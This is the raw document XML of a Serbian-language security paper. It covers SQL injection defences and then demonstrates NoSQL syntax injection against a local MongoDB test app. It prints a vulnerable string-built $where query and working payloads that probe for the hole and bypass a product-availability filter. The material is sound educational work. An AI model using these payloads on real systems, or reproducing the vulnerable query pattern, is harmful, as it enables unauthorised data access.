          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Least privilege</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), prema kojem svaki korisnički nalog u bazi treba da ima samo nivo pristupa koji mu je neophodan. </w:t>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ovaj način se značajno smanjuje potencijalna šteta u slučaju uspešnog SQLi napada. Na primer, ako aplikacija koristi nalog sa isključivo ,,read-only’’ privilegijama, maliciozni upiti neće moći da menjaju strukturu baze podataka niti da brišu postojeće podatke.</w:t>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Dodatno, za precizniju kontrolu pristupa mogu se koristiti i pogledi (eng. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Views</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), koji organičavaju vidljivost određenih kolona ili vrsta, kao i skladištene procedure (eng. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored Procedures</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), kojima se unapred definišu dozvoljene operacije. Na taj način aplikacioni nalozi nemaju direktan pristup tabelama, već komuniciraju sa bazom podataka isključivo preko navedenih mehanizama.</w:t>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Style w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e3hpwn8l2lo9" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. NoSQL INJECTION (NoSQLi) NAPADI</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Slično SQLi napadima, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NoSQL Injection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NoSQLi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) napadi se baziraju na kreiranju specifičnog teksta (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) kako bi se promenila ili zaobišla logika postojećeg upita u cilju prikupljanja podataka ili zaobilaženja aplikativne logike. Ovakvi napadi se izvode nad NoSQL bazama podataka, a u okviru ovog poglavlja će biti dati primeri nad MongoDB bazom podataka, s obzirom da ona predstavlja jedno od najčešćih NoSQL rešenja. </w:t>
      </w:r>
    </w:p>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NoSQL Injection tipovi napada se mogu podeliti u sledeće dve kategorije:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F3">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Syntax Injection </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- gde je cilj umetnuti payload tako da se naruši sintaksa originalnog upita</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F4">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Operator Injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - u okviru kojih se koriste NoSQL operatori u cilju manipulacije originalnog upita</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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obzirom da NoSQL baze podataka često koriste posebnu implementaciju query jezika, sintaksa se može značajno razlikovati, ali se u velikoj meri principi mogu porediti sa spomenutim u okviru SQLi tipova napada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Demonstracija će biti izvršena nad lokalnim okruženjem</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namenjeno legitimnom testiranju sigurnosti. Okruženje se sastoji iz sledeće dve kolekcije: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F8">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Produkti (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">products</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) koja sadrži atribute: kategorija (</w:t>
      </w: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ime (</w:t>
      </w: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cena (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">price</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) i da li je produkt dostupan (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">released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9">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Korisnici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koja sadrži atribute: korisničko ime (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), lozinka (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b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i uloga (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">role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A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d676x72gtdys" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Syntax Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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Najpre je potrebno testirati sistem na postojanje potencijalnih NoSQLi ranjivosti. Ovo se može učiniti korišćenjem specijalnih karaktera i stringova u cilju izazivanja greške ili otkrivanja atipičnog ponašanja sistema. Tipovi karaktera i njihova uloga se mogu razlikovati u zavisnosti od baze podataka. Prilikom testiranja ranjivosti u MongoDB bazi podataka se može iskoristiti apostrof (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kao payload umesto naziva kategorije, gde je primer ranjivog upita:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FD">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db.products.find({ $where: "this.category == '${input}' &amp;&amp; this.released == 1" })</w:t>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rezultat </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vidljiv na slici 30:</w:t>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8175" cy="1069701"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4"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448175" cy="1069701"/>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30 - Testiranje na potencijalne NoSQLi ranjivosti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000202">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osnovu poruke o grešci se može zaključiti da baza podataka interpretira unet apostrof kao deo upita, gde je rezultujući upit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000204">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db.products.find({ $where: "this.category == ''' &amp;&amp; this.released == 1" })</w:t>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što predstavlja nevalidnu sintaksu zbog neadekvatno zatvorenog string literala i dovodi do greške pri izvršenju upita. Ovo ponašanje ukazuje na mogućnost NoSQLi napada.</w:t>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Dodatno, moguće je izvršiti dodavanje uslova unutar payload-a. Najpre, na slici 31 je vidljivo regularno ponašanje aplikacije unosom vrednosti </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fizzy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71938" cy="3941427"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9"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4071938" cy="3941427"/>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Slika 31 - Primer regularnog unosa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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posmatranja regularnog ponašanja, moguće je iskoristiti logičke uslove korišćenjem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> operatora i posmatrati promene u odgovoru aplikacije. Konkretno, iskorišćeni payload-ovi su:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fizzy' &amp;&amp; 1 &amp;&amp; 'x</w:t>
      </w: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fizzy' &amp;&amp; 0 &amp;&amp; 'x</w:t>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 kojih prvi ne bi trebalo da utiče na izvršenje upita, dok potonji postaje netačan. Dodatno, razlog za dodavanjem poslednjeg dela uslova, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp; 'x</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> je zbog postojanja apostrofa unutar originalnog upita kojim se definiše kategorija produkta. Na slikama 32 a) i b) se mogu videti razlike u ponašanju aplikacije prilikom prosleđivanja spomenutih payload-ova, respektivno:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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238795" cy="2741022"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17"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238795" cy="274102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p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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329113" cy="1186343"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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329113" cy="1186343"/>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p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000214">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Slike 32 a) i b) - Upoređivanje ponašanja aplikacije pri tačnom i netačnom uslovu, respektivno</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000215">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slučaju, cilj je zaobići poslednji uslov unutar originalnog upita, konkretno </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp; this.released == 1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> i prikazati sve produkte </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fizzy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kategorije, kao i produkte koji nisu dostupni (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">released: 0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) iz ostalih kategorija. Korišćenjem prethodnih payload primera je pokazano da je moguće uticati na logiku upita, te je moguće iskoristiti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operator unutar payload-a, na primer:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000217">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fizzy' || this.released == 0 || 'a'=='b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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gde je rezultat vidljiv na slici 33:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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7141" cy="3500438"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="19"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4707141"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33 - Korišćenje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operatora</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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obzirom da je rezultujući upit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021D">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"$where": "this.category == 'fizzy' || this.released == 0 || 'a'=='b' &amp;&amp; this.released == 1" }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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najpre će se izvršiti evaluacija uslova </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'a'=='b' &amp;&amp; this.released == 1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> zbog veće prednosti operatora </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, koji će biti </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">false</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Zatim se vrši ,,kratkospajanje’’ (eng. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-circuiting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) uslova, tj. evaluacija preostalih uslova sleva nadesno:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021F">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this.category == 'fizzy' || this.released == 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Konkretno, ukoliko je prvi uslov ispunjen, neće se evaluirati drugi uslov. Drugi uslov se evaluira u slučaju da prvi nije ispunjen. Kao rezultat će biti prikazani svi produkti kojima je naziv kategorije jednak </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fizzy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> i produkti iz ostalih kategorija kojima je atribut </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">released</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
